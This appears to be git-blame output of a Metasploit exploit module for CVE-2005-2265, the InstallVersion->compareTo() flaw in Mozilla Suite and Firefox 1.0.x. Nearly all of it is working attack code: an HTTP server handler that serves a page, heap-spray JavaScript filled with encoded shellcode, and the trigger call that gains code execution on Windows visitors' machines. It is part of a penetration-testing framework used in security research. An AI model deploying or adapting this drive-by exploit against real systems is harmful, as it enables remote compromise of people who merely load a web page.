2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-04-04 04:37:30 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = NormalRanking
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2006-07-31 02:50:41 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::FF,
|
|
|
|
:ua_ver => "1.0",
|
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
|
|
:javascript => true,
|
|
|
|
:rank => NormalRanking, # reliable memory corruption
|
|
|
|
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
|
|
|
|
})
|
|
|
|
|
2006-07-31 02:50:41 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a code execution vulnerability in the Mozilla
|
|
|
|
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
|
|
|
|
module is a direct port of Aviv Raff's HTML PoC.
|
|
|
|
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2009-07-19 20:48:47 +00:00
|
|
|
'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2006-07-31 02:50:41 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2009-07-19 20:48:47 +00:00
|
|
|
['CVE', '2005-2265'],
|
|
|
|
['OSVDB', '17968'],
|
|
|
|
['BID', '14242'],
|
|
|
|
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
|
2006-07-31 02:50:41 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 400,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2009-12-14 23:27:28 +00:00
|
|
|
# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
|
|
|
|
# WinXP-SP3 and Win2kAS-SP0
|
|
|
|
[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
|
2006-07-31 02:50:41 +00:00
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Arch' => ARCH_X86,
|
2009-12-14 23:27:28 +00:00
|
|
|
'Ret' => 0x0c0c0c0c,
|
2006-07-31 02:50:41 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
2009-12-14 23:27:28 +00:00
|
|
|
'DefaultTarget' => 0,
|
2006-07-31 02:50:41 +00:00
|
|
|
'DisclosureDate' => 'Jul 13 2005'
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
|
|
|
|
# Re-generate the payload
|
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
|
|
|
2008-07-19 05:04:33 +00:00
|
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
2006-12-10 03:26:53 +00:00
|
|
|
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
2007-04-04 04:37:30 +00:00
|
|
|
|
|
|
|
# Handle the payload
|
2006-07-31 02:50:41 +00:00
|
|
|
handler(cli)
|
|
|
|
end
|
|
|
|
|
|
|
|
def generate_html(payload)
|
|
|
|
|
|
|
|
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
|
|
|
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
|
|
|
|
|
2009-12-14 23:27:28 +00:00
|
|
|
spray_to = sprintf("0x%.8x", target.ret)
|
|
|
|
spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
|
|
|
spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
|
|
|
eax_address = sprintf("0x%.8x", target.ret)
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
return %Q|
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<!--
|
|
|
|
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
|
|
|
|
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
|
|
|
|
Greets: SkyLined, The Insider and shutdown
|
|
|
|
-->
|
|
|
|
<title>One second please...</title>
|
|
|
|
<script language="javascript">
|
|
|
|
|
|
|
|
function BodyOnLoad()
|
|
|
|
{
|
|
|
|
location.href="javascript:void (new InstallVersion());";
|
|
|
|
CrashAndBurn();
|
|
|
|
};
|
|
|
|
|
2009-12-14 23:27:28 +00:00
|
|
|
#{js_heap_spray}
|
2006-07-31 02:50:41 +00:00
|
|
|
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
|
|
|
|
function CrashAndBurn()
|
|
|
|
{
|
|
|
|
// Payload - Just return..
|
|
|
|
var payLoadCode=unescape("#{enc_code}");
|
|
|
|
|
|
|
|
// Size of the heap blocks
|
|
|
|
var heapBlockSize=0x400000;
|
2009-12-14 23:27:28 +00:00
|
|
|
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
// Set address to fake "pdata".
|
2009-07-19 20:48:47 +00:00
|
|
|
var eaxAddress = #{eax_address};
|
2006-07-31 02:50:41 +00:00
|
|
|
|
|
|
|
// This was taken from shutdown's PoC in bugzilla
|
|
|
|
// struct vtbl { void (*code)(void); };
|
|
|
|
// struct data { struct vtbl *pvtbl; };
|
|
|
|
//
|
|
|
|
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
|
|
|
|
// pdata->pvtbl->code(pdata);
|
|
|
|
//
|
|
|
|
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
|
|
|
|
}
|
|
|
|
// -->
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body onload="BodyOnLoad()">
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|